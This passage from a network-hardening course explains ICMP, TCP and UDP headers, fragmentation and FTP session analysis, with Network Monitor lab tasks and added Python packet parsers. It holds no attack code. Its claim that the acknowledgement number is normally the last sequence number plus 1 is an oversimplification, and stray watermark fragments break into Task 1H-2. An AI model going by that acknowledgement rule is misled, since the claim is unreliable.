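        raise ValueError("ICMP message is shorter than 8 bytes")
    icmp_type, code, _csum = struct.unpack("!BBH", message[:4])
    info = {"type": icmp_type, "code": code,
            "name": ICMP_TYPES.get(icmp_type, "unknown"),
            "checksum_ok": internet_checksum(message) == 0}
    rest = message[4:]
    if icmp_type in (0, 8):
        info["identifier"], info["sequence"] = struct.unpack("!HH", rest[:4])
        info["payload"] = rest[4:]
    elif icmp_type == 3:
        info["detail"] = UNREACHABLE_CODES.get(code, "other code")
        info["quoted"] = rest[4:]          # what the router sent back of the original datagram
    return info


def match_ping(request: bytes, reply: bytes) -> bool:
    """True when the reply answers this request: types 8 and 0, both checksums good, and
    identifier, sequence number and payload all identical (the check ping itself makes)."""
    rq, rp = parse_icmp(request), parse_icmp(reply)
    if rq["type"] != 8 or rp["type"] != 0 or not (rq["checksum_ok"] and rp["checksum_ok"]):
        return False
    return all(rq[k] == rp[k] for k in ("identifier", "sequence", "payload"))


if __name__ == "__main__":
    # Constructed sample, modelled on the 32-byte payload Windows ping sends
    data = b"abcdefghijklmnopqrstuvwabcdefghi"
    req, rep = build_echo(8, 0x0200, 1, data), build_echo(0, 0x0200, 1, data)
    print(parse_icmp(req)["name"], match_ping(req, rep))
```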
Topic 1E

Capturing and Identifying TCP Headers

When investigating TCP/IP, you will find that TCP data is encapsulated in the IP datagram. Since you have already looked into the IP datagram itself, at this stage you will examine TCP further. In Figure 1-18, you can see the actual format of the TCP header. There are seven rows of information in the figure, with the critical ones for this discussion being the first five. Just as with IP, when a computer receives the TCP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.

To work with TCP further, refer to RFC 793.

TCP Header, with All Fields Shown

Figure 1-18: A TCP header with all fields shown.

Using Figure 1-18, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the TCP header. Starting on Row One, on the left side is a field called Source Port Number. This field is a 16-bit number that defines the upper-layer application that is using TCP on the source host.

The second field on Row One is a field called Destination Port Number. This is a 16-bit field that defines the upper-layer application that is using TCP on the destination host. The combination of an IP address and a port number is often called a socket. A socket pair identifies both ends of a communication completely, by using the source IP address and port and the destination IP address and port. Moving on to Row Two, the entire row is a single field called Sequence Number. This is a 32-bit value that identifies the unique sequence number of this packet. The sequence numbers are used to track communication and are part of the reason TCP is considered a connection-oriented protocol.

In Row Three, you can see that the entire row is also a single field, called Acknowledgement Number. This is a 32-bit value that provides a response to a sequence number. Under normal operations, this value will be the value of the sequence number of the last packet received in this line of communication, plus 1. There will be a value in this field only if the ACK flag is turned on (flags are in the next row).

Continuing on to Row Four, starting on the left side is a field called Offset (sometimes also called Header Length). This is a 4-bit value that defines the size of the TCP header. Because this is a 4-bit value, the limit on the size of the header is 60 bytes. If there are no options set, the size of the header is 20 bytes.

Moving to the right is a field called Reserved. This is a 6-bit value that is always left at 0 for functioning hosts using TCP/IP. It is not used for any normal network traffic.

After the Reserved field are the six Control Flags. Each flag is only 1 bit, either on or off. There are six control flags, and they are listed as follows in the left-to-right order they occupy in the TCP header:

• URG: If this is a 1, the Urgent flag is set.
• ACK: If this is a 1, the Acknowledgement flag is set.
• PSH: If this is a 1, the Push flag is set.
• RST: If this is a 1, the Reset flag is set.
• SYN: If this is a 1, the Synchronize flag is set.
• FIN: If this is a 1, the Finish flag is set.

For a detailed discussion on the flags and their functions, please review that section earlier in this lesson.

Following the Control Flags on Row Four is a field called Window Size. This is a 16-bit value that identifies the number of bytes, starting with the one defined in the Acknowledgement field, that the sender of this segment is willing to accept. Moving on to Row Five, on the left side, there is a field called TCP Checksum. This is a 16-bit value that is used to provide an integrity check of the TCP header and the TCP data. The value is calculated by the sender, then stored, and the receiver compares the value upon receipt. Following the TCP checksum on Row Five is a field called Urgent Pointer. This is a 16-bit value that is used if the sender must send emergency information. The pointer points to the sequence number of the byte that follows the urgent data, and is only active if the URG flag has been set. The Sixth Row has only one field, called Options. This is a 32-bit value that is often used to define a maximum segment size (MSS). MSS is used so the sender can inform the receiver of the maximum segment size that the sender is going to receive on return communication. In the event that the options set do not take up all 32 bits, padding will be added to fill the field.

The Seventh and final Row is the representation of the data. By this point, the header is complete and the data the user wants to send or receive is stored in the packet.

TASK 1E-1

Capturing and Identifying TCP Headers

Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.

1. Begin a new capture.

2. Switch to the command prompt and initiate a Telnet session to a neighboring host. Whether or not it connects at this time is not important, so the Telnet service does not need to be on.

3. If the Telnet session starts, exit the Telnet session; otherwise, close the command prompt.

4. Stop and view the capture.

5. Add a filter so that all you see are TCP frames. For the specific steps to add filters, see Task 1B-1, step 12 through step 16.

6. Analyze the TCP headers in the frames.

7. When analyzing the headers, look for the following:
a. Sequence Numbers
b. Acknowledgement Numbers
c. Source Port Numbers
d. Destination Port Numbers

8. Once you have analyzed the header, save the capture as Telnet_Attempt.cap, and close the capture.

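The TCP header fields above, together with the three-way handshake you examined frame by frame in Task 1B-4, as an added Python example that is not part of the course material: a row-by-row header parser, an MSS option reader, and a check that three segments form a valid handshake (SYN only; SYN+ACK acknowledging the client ISN + 1; ACK acknowledging the server ISN + 1). Client port 2025, server port 21 and the client sequence number 7A5487B0 are the values Task 1H-2 reports for frame 3 of ftp.cap; the server's sequence number, the window size and the MSS option are assumptions.

```python
import struct
from dataclasses import dataclass

# The six control flags in the left-to-right order they occupy in Row Four
FLAG_BITS = (("URG", 0x20), ("ACK", 0x10), ("PSH", 0x08), ("RST", 0x04), ("SYN", 0x02), ("FIN", 0x01))
TCP_FIXED_FMT = "!HHIIBBHHH"   # Rows One to Five: 20 bytes


@dataclass
class TCPHeader:
    src_port: int
    dst_port: int
    seq: int
    ack: int
    offset: int        # header length in 32-bit words: 5 without options, at most 15 (60 bytes)
    reserved: int      # the 6-bit field that should always be 0
    flags: frozenset
    window: int
    checksum: int
    urgent_ptr: int
    options: bytes
    data: bytes


def parse_tcp(segment: bytes) -> TCPHeader:
    """Read the header row by row, as the text describes."""
    if len(segment) < 20:
        raise ValueError("segment is shorter than the 20-byte minimum TCP header")
    src, dst, seq, ack, off_res, res_flags, window, csum, urg = struct.unpack(TCP_FIXED_FMT, segment[:20])
    offset = off_res >> 4
    reserved = ((off_res & 0x0F) << 2) | (res_flags >> 6)   # the 6 reserved bits straddle two bytes
    header_len = offset * 4
    if offset < 5 or header_len > len(segment):
        raise ValueError(f"Offset {offset} claims a {header_len}-byte header")
    flags = frozenset(name for name, bit in FLAG_BITS if res_flags & bit)
    return TCPHeader(src, dst, seq, ack, offset, reserved, flags, window, csum, urg,
                     segment[20:header_len], segment[header_len:])


def mss_option(options: bytes):
    """Return the Maximum Segment Size carried in the options (kind 2, length 4), or None."""
    i = 0
    while i < len(options):
        kind = options[i]
        if kind == 0:                                      # end of option list
            return None
        if kind == 1:                                      # no-operation (padding)
            i += 1
            continue
        if i + 1 >= len(options) or options[i + 1] < 2:    # truncated or malformed option
            return None
        if kind == 2 and options[i + 1] == 4:
            return struct.unpack("!H", options[i + 2:i + 4])[0]
        i += options[i + 1]
    return None


def build_tcp(src_port, dst_port, seq, ack, flags, window=8192, options=b"", data=b""):
    """Construct a segment; the checksum needs the IP pseudo-header, so it is left at 0 here."""
    flag_byte = sum(bit for name, bit in FLAG_BITS if name in flags)
    options += b"\x00" * ((-len(options)) % 4)             # pad options to a 32-bit boundary
    offset = 5 + len(options) // 4
    fixed = struct.pack(TCP_FIXED_FMT, src_port, dst_port, seq, ack, offset << 4, flag_byte, window, 0, 0)
    return fixed + options + data


def check_handshake(segments) -> list:
    """Compare three segments with the three-way handshake the text describes and return
    a list of problems; an empty list means the exchange is a valid SYN, SYN/ACK, ACK."""
    if len(segments) != 3:
        raise ValueError("a three-way handshake is exactly three segments")
    syn, synack, ack = (parse_tcp(s) for s in segments)
    problems = []
    if syn.flags != {"SYN"}:
        problems.append("first segment must carry SYN and no other flag")
    if (synack.src_port, synack.dst_port) != (syn.dst_port, syn.src_port):
        problems.append("SYN/ACK does not come back on the reversed socket pair")
    if synack.flags != {"SYN", "ACK"}:
        problems.append("second segment must carry SYN and ACK")
    elif synack.ack != (syn.seq + 1) & 0xFFFFFFFF:
        problems.append("SYN/ACK does not acknowledge client ISN + 1")
    if "ACK" not in ack.flags or "SYN" in ack.flags:
        problems.append("third segment must carry ACK without SYN")
    elif ack.ack != (synack.seq + 1) & 0xFFFFFFFF:
        problems.append("final ACK does not acknowledge server ISN + 1")
    return problems


if __name__ == "__main__":
    # Client port 2025 (07E9), server port 21 (15) and client ISN 7A5487B0 are the values Task 1H-2
    # reports for frame 3 of ftp.cap; the server ISN 1122AABB and the MSS option are constructed.
    mss = b"\x02\x04\x05\xb4"                                   # MSS 1460
    syn = build_tcp(2025, 21, 0x7A5487B0, 0, {"SYN"}, options=mss)
    synack = build_tcp(21, 2025, 0x1122AABB, 0x7A5487B1, {"SYN", "ACK"}, options=mss)
    ack = build_tcp(2025, 21, 0x7A5487B1, 0x1122AABC, {"ACK"})
    print(parse_tcp(syn).flags, mss_option(parse_tcp(syn).options), check_handshake([syn, synack, ack]))
```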

Topic 1F

Capturing and Identifying UDP Headers

Compared to TCP, UDP is a very simple transport protocol. The UDP header and data will be completely encapsulated in the IP datagram, just as with TCP. In Figure 1-19, you can see the actual format of the UDP header. There are three rows of information in the figure. Just as with TCP, when a computer receives the UDP header, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.

To work with UDP further, refer to RFC 768.

UDP Header, with All Fields Shown

Figure 1-19: A UDP header with all fields shown.

Using Figure 1-19, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the UDP header. Starting on Row One, on the left side is a field called Source Port Number. This field is a 16-bit value that defines the upper-layer application that is using UDP on the source host.

The second field on Row One is called Destination Port Number. This field is a 16-bit value that defines the upper-layer application that is using UDP on the destination host. On the Second Row, the field on the left is called UDP Length. This is a 16-bit value that identifies the length of the UDP data and the UDP header.

The second field on Row Two is a field called UDP Checksum. This is a 16-bit value that is used to provide an integrity check of the UDP header and the UDP data. The value is calculated by the sender, then stored, and the receiver compares the value upon receipt.

Row Three is where the actual user data is stored. It is possible for a user to send a UDP datagram with zero bytes of data.

TASK 1F-1

Working with UDP Headers

Setup: You are logged on to Windows 2000 as Administrator, and Network Monitor is running.

1. Browse your course CD-ROM to find a folder called \085545\Data\Captures. In that folder is a file called tftp.cap. Open tftp.cap in Network Monitor.

2. Expand the details of any UDP frame, and compare it to the discussion. Look for the following:
a. Source Port
b. Destination Port
c. What the actual UDP data is

3. As you are analyzing this traffic, verify that no session was established, as UDP is connectionless.

4. Close the capture.

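The UDP Length and UDP Checksum fields above, as an added Python example that is not part of the course material. It goes one step beyond the text: the checksum the sender stores is computed over a pseudo-header (source and destination IP, protocol 17, UDP Length) in addition to the UDP header and data (RFC 768), so a receiver needs both IP addresses to verify it. The TFTP request, ports and addresses are constructed; nothing here is taken from tftp.cap.

```python
import struct


def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words, odd tail zero-padded (the same rule IP and ICMP use)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _ip_bytes(ip: str) -> bytes:
    return bytes(map(int, ip.split(".")))


def _pseudo_header(src_ip: str, dst_ip: str, udp_length: int) -> bytes:
    """RFC 768 pseudo-header: ties the checksum to the addresses, so a datagram delivered to
    the wrong host fails the check even when its own bytes arrived intact."""
    return struct.pack("!4s4sBBH", _ip_bytes(src_ip), _ip_bytes(dst_ip), 0, 17, udp_length)


def build_udp(src_ip: str, dst_ip: str, src_port: int, dst_port: int, data: bytes = b"") -> bytes:
    """Construct a UDP datagram; zero bytes of data is legal and gives UDP Length 8."""
    length = 8 + len(data)
    header = struct.pack("!HHHH", src_port, dst_port, length, 0)
    csum = internet_checksum(_pseudo_header(src_ip, dst_ip, length) + header + data)
    if csum == 0:
        csum = 0xFFFF          # a computed 0 is sent as all ones; 0 on the wire means "no checksum"
    return struct.pack("!HHHH", src_port, dst_port, length, csum) + data


def parse_udp(src_ip: str, dst_ip: str, datagram: bytes) -> dict:
    """Read the two header rows and verify the stored checksum (None when the sender sent none)."""
    if len(datagram) < 8:
        raise ValueError("UDP datagram is shorter than its 8-byte header")
    src_port, dst_port, length, csum = struct.unpack("!HHHH", datagram[:8])
    if length < 8 or length > len(datagram):
        raise ValueError(f"UDP Length {length} does not fit the {len(datagram)} bytes received")
    if csum == 0:
        checksum_ok = None     # allowed over IPv4: the sender chose not to compute one
    else:
        covered = _pseudo_header(src_ip, dst_ip, length) + datagram[:length]
        checksum_ok = internet_checksum(covered) == 0
    return {"src_port": src_port, "dst_port": dst_port, "length": length,
            "checksum_ok": checksum_ok, "data": datagram[8:length]}


if __name__ == "__main__":
    # Constructed sample: a TFTP read request (opcode 1, file name, transfer mode) to port 69
    rrq = b"\x00\x01" + b"boot.img\x00" + b"octet\x00"
    dgram = build_udp("172.16.10.5", "172.16.10.9", 1045, 69, rrq)
    print(parse_udp("172.16.10.5", "172.16.10.9", dgram))
```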
Topic 1G

Analyzing Packet Fragmentation

Packet-switched networks will all, at one time or another, experience fragmentation. This is due to the fact that all complex networks are made up of various physical media and configurations. So, a packet of a certain size might fit fine on one segment, but may suddenly be many times larger than the capacity of the next segment. The size limit that is allowed to exist on a network varies from network to network and is referred to as the Maximum Transmission Unit (MTU).

In the event that a datagram gets fragmented, it is not reassembled until it reaches its final destination. When the datagram is fragmented, each fragment becomes its own unique packet, transmitted and received uniquely.

Fragmentation will rarely happen at the source of a datagram, but it is possible. For example, a receiving host might say it can accept segments that are many times larger than what the sender normally sends. Another example would be a host on a small-packet-sized network, such as PPP, using an application with a fixed-size message. The common location for fragmentation, then, is at a gateway, where the odds of different MTUs on different interfaces are very high. The following list shows the MTU for various media:

• PPP: 296 bytes
• Ethernet: 1500 bytes
• FDDI: 4352 bytes
• Token Ring (4 MB/s): 4464 bytes
• Token Ring (16 MB/s): 17914 bytes

The official minimum MTU is 68, and the maximum is 65535.

Fragmentation Rules

TCP segments are sent using IP datagrams. TCP expects a one-to-one ratio of segments to datagrams. Therefore, IP on the receiving end must completely reassemble the datagram before handing the segment to TCP. In the relationship between TCP and IP, the following rules that affect fragmentation are defined:

• The TCP Maximum Segment Size (MSS) is the IP Maximum Datagram Size minus 40 octets.
• The default IP Maximum Datagram Size is 576 octets.
• The default TCP Maximum Segment Size is 536 octets.

How Fragmentation Works

Figure 1-20: How fragmentation works.

TASK 1G-1

Analyzing Fragmentation

Setup: You are logged on to Windows 2000 as Administrator, and Network Monitor is running.

1. On the course CD-ROM, navigate to the \085545\Data\Captures folder, and open fragment.cap in Network Monitor.

2. Expand the details of frame 1, looking for the Fragment flag.

3. Observe that, in frame 1, there is no Fragment Offset, as this is the first fragment.

4. Select several consecutive frames. Observe that each successive frame has a higher Fragment Offset as it gets farther from the beginning of the original datagram.

5. Observe that the IP ID stays constant for each fragment.

6. Expand the details of frame 16.

7. Observe that the Fragment flags are now both 0, indicating this is the last of the fragments.

8. Close the capture.

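The fragmentation rules above and the three things Task 1G-1 has you observe in fragment.cap (constant IP ID, increasing Fragment Offset, MF cleared on the last piece), as an added Python example that is not part of the course material: a gateway-style fragmenter that honours DF and recomputes each fragment's header checksum, and a receiver-side reassembler that only delivers a datagram once every piece is present. The header values and payload are constructed; the two MTUs, 1500 and 296, are the Ethernet and PPP values from the list.

```python
import struct

IP_HEADER_FMT = "!BBHHHBBH4s4s"


def internet_checksum(data: bytes) -> int:
    """One's-complement 16-bit sum (RFC 791); every fragment gets its own recomputed header checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def fragment(header: bytes, payload: bytes, mtu: int) -> list:
    """Split a datagram (20-byte header, no options) as a gateway does when the next link's MTU is
    too small: same Identification in every piece, MF=1 on all but the last, offsets in 8-byte units."""
    if mtu < 68:
        raise ValueError("MTU below the official minimum of 68")
    ver_ihl, tos, _, ident, flags_frag, ttl, proto, _, src, dst = struct.unpack(IP_HEADER_FMT, header[:20])
    if flags_frag & 0x4000:
        raise ValueError("DF bit set: this datagram must be discarded, not fragmented")
    per_fragment = (mtu - 20) // 8 * 8           # data per fragment must be a multiple of 8 bytes
    pieces = []
    for start in range(0, len(payload), per_fragment):
        chunk = payload[start:start + per_fragment]
        more = start + per_fragment < len(payload)
        ff = (0x2000 if more else 0) | (start // 8)
        fields = [ver_ihl, tos, 20 + len(chunk), ident, ff, ttl, proto, 0, src, dst]
        fields[7] = internet_checksum(struct.pack(IP_HEADER_FMT, *fields))
        pieces.append(struct.pack(IP_HEADER_FMT, *fields) + chunk)
    return pieces


def fragment_info(frag: bytes) -> tuple:
    """(Identification, Fragment Offset in 8-byte units, MF flag, header checksum verifies)."""
    _, _, _, ident, ff, _, _, _, _, _ = struct.unpack(IP_HEADER_FMT, frag[:20])
    return ident, ff & 0x1FFF, bool(ff & 0x2000), internet_checksum(frag[:20]) == 0


def reassemble(fragments: list) -> dict:
    """Group fragments by (source, destination, protocol, Identification) and rebuild each datagram
    whose pieces are all present and contiguous; anything with a hole stays undelivered."""
    buckets = {}
    for frag in fragments:
        ver_ihl, _, total_len, ident, ff, _, proto, _, src, dst = struct.unpack(IP_HEADER_FMT, frag[:20])
        header_len = (ver_ihl & 0x0F) * 4
        key = (src, dst, proto, ident)
        buckets.setdefault(key, []).append(((ff & 0x1FFF) * 8, bool(ff & 0x2000), frag[header_len:total_len]))
    complete = {}
    for key, pieces in buckets.items():
        pieces.sort(key=lambda p: p[0])          # arrival order does not matter
        data, expected, finished = b"", 0, False
        for offset, more, chunk in pieces:
            if offset != expected:               # a hole or an overlap: cannot deliver yet
                break
            data += chunk
            expected += len(chunk)
            if not more:                         # MF=0 marks the last fragment
                finished = True
                break
        if finished:
            complete[key] = data
    return complete


# Constructed sample: a 3072-byte UDP payload from a classroom host to its router, Identification 0x3A7B
SAMPLE_HEADER = struct.pack(IP_HEADER_FMT, 0x45, 0, 0, 0x3A7B, 0, 64, 17, 0,
                            bytes([172, 16, 10, 5]), bytes([172, 16, 0, 1]))
SAMPLE_PAYLOAD = bytes(range(256)) * 12

if __name__ == "__main__":
    for mtu in (1500, 296):                      # Ethernet and PPP from the MTU list
        pieces = fragment(SAMPLE_HEADER, SAMPLE_PAYLOAD, mtu)
        print(mtu, len(pieces), "fragments", [fragment_info(p)[1:3] for p in pieces][:3], "...")
```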
Topic 1H

Analyzing an Entire Session

Now that you have analyzed IP, TCP, UDP, ICMP, fragmentation, handshakes, and teardowns, it is time to put them together. In this topic, you will follow along using two sample captures that were made specifically for this purpose. One capture is a PING capture, and the other is an FTP capture. By analyzing them, you will see completely how TCP/IP functions, from start to finish.

About the Tasks

In the following tasks, Windows 2000 Network Monitor was used to capture a ping between two hosts and an ftp session between two hosts. The ping and ftp commands were run from the command prompt, and the output saved to the text files ping.txt and ftp.txt, respectively. The Network Monitor captures were saved to files ping.cap and ftp.cap, respectively. You can open the TXT files with Notepad to see the commands and responses. You can open the CAP files with Network Monitor and see the frames captured as a result. Let's take a look.

TASK 1H-1

Performing a Complete ICMP Session Analysis

Objective: To use the supplied capture and text files to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.

Setup: You are logged on to Windows 2000 as Administrator, and Network Monitor is running.

1. Start Notepad, and open the file ping.txt. This file is on your course CD-ROM, in the \085545\Data\Captures folder. You should see the output shown in the following graphic.

2. Keep this file open.

3. Switch to Network Monitor, and open the file ping.cap. It's also located on your course CD-ROM, in the \085545\Data\Captures folder.

4. Observe that frame 1 is an Ethernet broadcast trying to resolve the target IP address to its MAC address.

5. Observe that frame 2 is a reply from the target machine with the appropriate resolution. From now on, the two hosts can communicate.

6. Observe the next two frames. They are ICMP echo messages going back and forth between the two hosts, corresponding to the output in the text file. Examine the ICMP messages, and see the details in frames 3 and 4 as shown in the following graphics.

7. Observe that, for the ping command, no session was set up or torn down, just a simple ICMP echo request, followed by an ICMP echo reply.

Continuing the Complete Session Analysis

In the last task, one host successfully pinged another, in preparation for establishing an FTP transaction. We'll look at the FTP portion of the session, but before we do, a quick differentiation between active and passive FTP is in order.

FTP Communication

Up to this point you have been examining ICMP communication. Now you will examine an active FTP session. There are two different types of FTP, something that many administrators are unfamiliar with. The two FTP types are simply called passive and active. The mode most people think of with FTP is active FTP. In active FTP, a client makes a connection to the FTP server. The client uses a port higher than 1024 (we'll call it X) to connect to the server, which then uses port 21, and the FTP command and control session is established. The server responds with the data transfer, sent on port 20. The client will receive the data transfer on a port one higher than the client used for command transfer, or X+1.

When active FTP is used, there can be a situation that firewalls dislike. The first part of the FTP session, from client to server, is not a problem. However, when the server responds to the client, it can seem to the firewall to be a new session started from an untrusted network, trying to gain access to the private network.

In passive mode FTP, the client initiates both connections between the client and the server. When the FTP client begins an FTP session, the client opens two ports (again one higher than 1024, and the next port higher, or X and X+1). The first connection and port is the session to the server for command and control on server port 21. The server then opens a random port (again higher than 1024, referred to as Y in this section), and sends this port information back to the client. The client then requests the data transfer from client port X+1 to server port Y.

Passive FTP solves this problem on the firewall, as both parts of the FTP session originate from the FTP client, and no session starts from an untrusted network. There is a different problem with passive FTP. This problem is not on the firewall, but on the server configuration itself. Because the FTP client starts both sessions, the FTP server must be able to listen on any high port, meaning all high ports must be open and available. To deal with this situation, many FTP applications now include features that limit the port range that the server can use.

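The active and passive exchanges described above, as an added Python example that is not part of the course material. It goes beyond the text in one respect: the port X+1 (active) or Y (passive) is announced on the control session as a PORT command or a 227 reply in h1,h2,h3,h4,p1,p2 form (RFC 959), which the example parses before working out who opens the data connection, whether a firewall that only permits sessions started from the trusted side would allow it, and whether a passive port falls in the server's configured range. The addresses and control lines are constructed; client port 2025 is the control-session port Task 1H-2 reports.

```python
import re
from dataclasses import dataclass

# Both the PORT command and the 227 reply carry an address and port as h1,h2,h3,h4,p1,p2
_HOST_PORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


@dataclass(frozen=True)
class DataConnection:
    mode: str            # "active" or "passive"
    initiator_ip: str    # the side that sends the SYN for the data connection
    initiator_port: int
    responder_ip: str
    responder_port: int


def _host_port(text: str):
    match = _HOST_PORT.search(text)
    if not match:
        raise ValueError(f"no h1,h2,h3,h4,p1,p2 tuple in: {text!r}")
    nums = [int(n) for n in match.groups()]
    if any(n > 255 for n in nums):
        raise ValueError(f"octet out of range in: {text!r}")
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def data_connection(control_line: str, client_ip: str, server_ip: str, client_ctrl_port: int) -> DataConnection:
    """From one line of the port-21 control session, work out the data connection it announces.
    Active: the client's PORT command names client port X+1 and the server connects from port 20.
    Passive: the server's 227 reply names server port Y and the client connects from X+1."""
    line = control_line.strip()
    if line.upper().startswith("PORT "):
        ip, port = _host_port(line)
        if ip != client_ip:   # accept only the control client's own address (standard server hardening)
            raise ValueError(f"PORT names {ip}, but the control connection is from {client_ip}")
        return DataConnection("active", server_ip, 20, ip, port)
    if line.startswith("227 "):
        ip, port = _host_port(line)
        if ip != server_ip:
            raise ValueError(f"227 names {ip}, but the control connection is to {server_ip}")
        return DataConnection("passive", client_ip, client_ctrl_port + 1, ip, port)
    raise ValueError("not a PORT command or a 227 reply")


def permitted_by_stateful_firewall(conn: DataConnection, trusted_prefix: str) -> bool:
    """The policy the text describes: a session may only start from the trusted (client) network."""
    return conn.initiator_ip.startswith(trusted_prefix)


def within_server_range(conn: DataConnection, low: int, high: int) -> bool:
    """The passive-mode fix the text mentions: the server's data port must lie in its configured range."""
    return conn.mode == "passive" and low <= conn.responder_port <= high


if __name__ == "__main__":
    # Constructed control lines; client port 2025 is the control-session port Task 1H-2 reports
    client, server = "172.16.10.5", "172.18.0.1"
    active = data_connection("PORT 172,16,10,5,7,234", client, server, 2025)     # 7*256+234 = 2026 = X+1
    passive = data_connection("227 Entering Passive Mode (172,18,0,1,195,80).", client, server, 2025)
    print(active, permitted_by_stateful_firewall(active, "172.16."))
    print(passive, permitted_by_stateful_firewall(passive, "172.16."), within_server_range(passive, 50000, 50100))
```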
TASK 1H-2
Performing a Complete FTP Session Analysis

Setup: You are logged on to Windows 2000 as Administrator. Notepad and Network Monitor are running. 1. Switch to Notepad, and open the le ftp.txt. This le is located on your course CD-ROM in the same folder as the other les. You should see the results shown in the following graphic.

Ed or
DO NO

ru ct
50 Hardening The Infrastructure (SCP)

2.

Observe that, in this session, when the ftp server asks for a password, the user enters it but it is not recorded on screen.

In

st

DU

PL

IC

AT

iti

on

Objective: To use the supplied capture and text les to examine the TCP/IP headers, in order to understand how a session is set up, used, and torn down.

3.

Switch to Network Monitor, and open the le ftp.cap. You should see the results similar to those shown in the following graphics. (Depending on the version of Network Monitor you are using, MAC and IP addresses might be displayed in Hex, and the time might be in a different format.)
If you would like to change the format of the addresses from Hex to more readable names, choose Display Addresses, and click Add. In the box that is displayed, enter FTPSITE for the Name, add 002B32CFC72 for the Address, verify that the Type is Ethernet, and click OK. Click Add again, then enter LOCAL for the Name, add 0002B32C5B13 for the Address, verify that the Type is Ethernet, and click OK twice.

4. There are 51 frames involved in this capture. If you would like to change the color of the FTP packets for easier viewing, choose Display→Colors. Scroll down and select FTP; then, from the Background drop-down list, select a mild color such as gray or teal, and click OK. If you select a darker color, it might make it more difficult to read the text.


5. Observe that frames 3, 4, and 5 represent the TCP handshake involved in establishing the session. Frames shaded gray (6, 8-9, 11-12, 14, 16-19, 23, 29, 31-34, 38, 44, and 46-47) are all directly involved with the ftp application: authentication, ftp requests for directory information, an actual file transfer, followed by a quit, and bye response.

6. Observe that in frame 8, you can see the user name being supplied.

7. Observe that in frame 9, you can see the request for a password.

8. Observe that in frame 11, you can see the password being supplied. Isn't this a good enough reason to employ some secure authentication such as encryption?

9. Let's view the three-way handshake frames in a bit more detail. Frame 3 starts the three-way handshake (Active Open) by setting the SYN bit to 1, offering source port no. 2025 (07E9 in Hex), while at the same time directing the request to port number 21 (15 in Hex) on the server. A sequence number 2052360112 (7A5487B0 in Hex) is associated with this frame to uniquely identify it, even in the event of multiple sessions between the same two hosts.

10. Let's look at the reply. The reply from the ftp server in frame 4 includes an ACK, while simultaneously including a SYN. This is the Passive Open.

11. Observe that frame 5 includes an ACK from the client. Once the session is established, FTP can continue on with its setup. This includes a login and a password (to be supplied if anonymous access is not supported), followed by file requests.


12. Observe that frame 6 shows the ftp server asking for user identification. Frame 8 shows the ftp client supplying the user name of testuser.


13. Observe that this is met by the ftp server asking for the password in frame 9.


14. Observe that in frame 11, you can see the password being offered. Because no secure methods for authentication were set up, you can see the actual password (the word plaintext).

15. Observe that once the user has been authenticated, the ftp session is allowed to continue. The ftp server puts out the welcome message shown in frame 12.


16. Observe that the rest of the frames dealing with FTP (frames 14, 16-19, 23, 29, 31-34, 38, and 44) have to do with directory listings and file transfers.


17. Observe that in frame 38, you can see the actual contents of the file as it is being transferred. In this case, and because it is just a text file, you can read the contents.


18. Observe that in frame 46, you can see the client attempt to close the connection with the Quit command.


19. Observe that in frame 47, you can see the server communicate with the client with the message See ya later.


20. Observe that these messages are followed by TCP terminating the session from both ends in frames 48 and 49, and 50 and 51, respectively, where the FIN bits are set to 1 and the corresponding frame contains the ACK bit set to 1.

21. Close Network Monitor. If you are prompted to save addresses, click No.

22. Close Notepad.
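The handshake and teardown the task walks through (frames 3-5 and 48-51), decoded by a small TCP header parser. This is an added example, not code from the course CD. The three handshake headers are constructed to match the values pointed out above (client port 2025 = 0x07E9, server port 21 = 0x15, client ISN 2052360112 = 0x7A5487B0); the server's ISN, the window size and the sequence numbers at teardown are assumptions, because ftp.txt does not show them.

```python
"""Decode the TCP headers of the FTP control session's setup and teardown.

Added example; it is not code from the course CD. The 20-byte TCP headers below
are constructed to match the values the task points out in frames 3, 4 and 5
(client port 2025 = 0x07E9, server port 21 = 0x15, client ISN 2052360112 =
0x7A5487B0) and the FIN/ACK pattern of frames 48-51. The server's ISN, the
sequence numbers at teardown and the window size are assumptions.
"""
import struct

# The six control bits, taken from the low byte of the data-offset/flags word.
TCP_FLAGS = {"URG": 0x20, "ACK": 0x10, "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}


def build_tcp_header(sport, dport, seq, ack, flags, window=16384):
    """Build a minimal 20-byte TCP header (no options; checksum left at zero)."""
    data_offset = 5 << 12                      # header length in 32-bit words
    flag_bits = sum(TCP_FLAGS[f] for f in flags)
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                       data_offset | flag_bits, window, 0, 0)


def parse_tcp_header(raw):
    """Return the fields an analyst reads first: ports, seq/ack numbers, control bits."""
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", raw[:20])
    flags = [name for name, bit in TCP_FLAGS.items() if off_flags & bit]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "hdr_len": (off_flags >> 12) * 4, "window": window}


def label_frame(parsed):
    """Name the frame's role in connection setup or teardown from its control bits."""
    flags = set(parsed["flags"])
    if flags == {"SYN"}:
        return "Active Open (SYN)"
    if flags == {"SYN", "ACK"}:
        return "Passive Open (SYN-ACK)"
    if "FIN" in flags:
        return "half-close (FIN)"
    if flags == {"ACK"}:
        return "acknowledgement (ACK)"
    return "data/other (" + "+".join(sorted(flags)) + ")"


CLIENT_ISN = 0x7A5487B0      # 2052360112, as shown for frame 3 in ftp.cap
SERVER_ISN = 0x1C2D3E4F      # assumed: ftp.txt does not show the server's ISN

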